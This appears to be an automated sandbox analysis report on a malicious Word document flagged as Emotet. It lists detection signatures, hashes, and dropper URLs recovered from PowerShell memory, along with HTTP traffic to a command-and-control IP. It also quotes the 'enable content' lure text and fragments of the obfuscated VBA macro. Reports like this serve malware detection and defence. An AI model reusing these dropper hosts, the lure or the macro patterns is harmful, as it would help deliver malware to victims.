Analysis Report DATA-480841.doc

Overview

General Information

Sample Name: DATA-480841.doc
Analysis ID: 336494
MD5: 2ed8a95357ee4e2d433bcbeb2ef43fc9
SHA1: 06838eec498718aace03e6ef28d3f0292a631f8a
SHA256: 485c5e8d7bc0f0fc416a7d6cfa8780ebc42c03ff41568af70c358ee8b8afa02c

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://veterinariadrpopui.com/content/5f18Q/ Avira URL Cloud: Label: malware
Source: http://khanhhoahomnay.net/wordpress/CGMC/ Avira URL Cloud: Label: malware
Source: http://shop.elemenslide.com/wp-content/n/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: DATA-480841.doc Virustotal: Detection: 59% Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree, 7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree, 7_2_10002730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002175AE CryptDecodeObjectEx, 15_2_002175AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0021109C FindFirstFileW, 15_2_0021109C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: wpsapk.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 104.18.61.59:80

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in memory: http://veterinariadrpopui.com/content/5f18Q/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 209.59.139.39 209.59.139.39
Source: Joe Sandbox View IP Address: 5.2.136.90 5.2.136.90
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /6tycsc/ HTTP/1.1DNT: 0Referer: 5.2.136.90/6tycsc/Content-Type: multipart/form-data; boundary=----------OGLPvif2cEUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 7412Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: unknown TCP traffic detected without corresponding DNS query: 5.2.136.90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0022023A InternetReadFile, 15_2_0022023A
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B01F17D-537D-406E-B057-1B1541B1D39D}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /wp-admin/v/ HTTP/1.1Host: wpsapk.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-includes/2jm3nIk/ HTTP/1.1Host: sofsuite.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /content/5f18Q/ HTTP/1.1Host: veterinariadrpopui.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wordpress/CGMC/ HTTP/1.1Host: khanhhoahomnay.netConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: wpsapk.com
Source: unknown HTTP traffic detected: POST /6tycsc/ HTTP/1.1DNT: 0Referer: 5.2.136.90/6tycsc/Content-Type: multipart/form-data; boundary=----------OGLPvif2cEUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.2.136.90Content-Length: 7412Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in binary or memory: http://campusexpo.org/department-of-odhmmkd/95eXZY/
Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmp String found in binary or memory: http://khanhhoahomnay.net
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in binary or memory: http://khanhhoahomnay.net/wordpress/CGMC/
Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmp String found in binary or memory: http://shop.elemenslide.com
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in binary or memory: http://shop.elemenslide.com/wp-content/n/
Source: powershell.exe, 00000005.00000002.2117671209.0000000003B34000.00000004.00000001.sdmp String found in binary or memory: http://sofsuite.com
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in binary or memory: http://sofsuite.com/wp-includes/2jm3nIk/
Source: powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmp String found in binary or memory: http://veterinariadrpopui.com
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in binary or memory: http://veterinariadrpopui.com/content/5f18Q/
Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmp String found in binary or memory: http://wpsapk.com
Source: powershell.exe, 00000005.00000002.2122315304.000000001B916000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in binary or memory: http://wpsapk.com/wp-admin/v/
Source: powershell.exe, 00000005.00000002.2109113846.00000000024D0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113596822.0000000002B00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115556900.0000000002900000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2116696036.0000000001CC7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111102238.0000000002287000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2113106480.0000000002007000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2116157944.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110481704.00000000020A0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2107505983.00000000002E4000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2112048540.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2116222591.00000000037E4000.00000004.00000001.sdmp String found in binary or memory: https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/
Source: powershell.exe, 00000005.00000002.2117636868.0000000003B18000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2117779149.0000000003B7E000.00000004.00000001.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2115843341.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2123134959.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2352653506.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2115897834.00000000004B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2114491757.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2109532201.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2113145679.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2120152287.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2116824052.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2114433259.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2113198407.00000000006C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2352632908.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.6c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.4b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.7d0000.1.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I Words: 3 N@m 13 ;a 10096 G)
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a S
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a S
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains an embedded VBA macro with suspicious strings
Source: DATA-480841.doc OLE, VBA macro line: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
Source: DATA-480841.doc OLE, VBA macro line: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
Source: DATA-480841.doc OLE, VBA macro line: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
Source: DATA-480841.doc OLE, VBA macro line: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
Source: DATA-480841.doc OLE, VBA macro line: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
Source: DATA-480841.doc OLE, VBA macro line: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
Source: DATA-480841.doc OLE, VBA macro line: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
Source: DATA-480841.doc OLE, VBA macro line: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
Source: DATA-480841.doc OLE, VBA macro line: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
Source: DATA-480841.doc OLE, VBA macro line: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
Source: DATA-480841.doc OLE, VBA macro line: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
Source: DATA-480841.doc OLE, VBA macro line: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
Source: DATA-480841.doc OLE, VBA macro line: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
Source: DATA-480841.doc OLE, VBA macro line: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
Source: DATA-480841.doc OLE, VBA macro line: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
Source: DATA-480841.doc OLE, VBA macro line: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
Source: DATA-480841.doc OLE, VBA macro line: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
Source: DATA-480841.doc OLE, VBA macro line: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA") Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB") Name: Jlda77h_v8nx5
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR") Name: Jlda77h_v8nx5
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD") Name: Jlda77h_v8nx5
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC") Name: Jlda77h_v8nx5
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs") Name: Hrs2a1p95u19
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD") Name: Hrs2a1p95u19
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
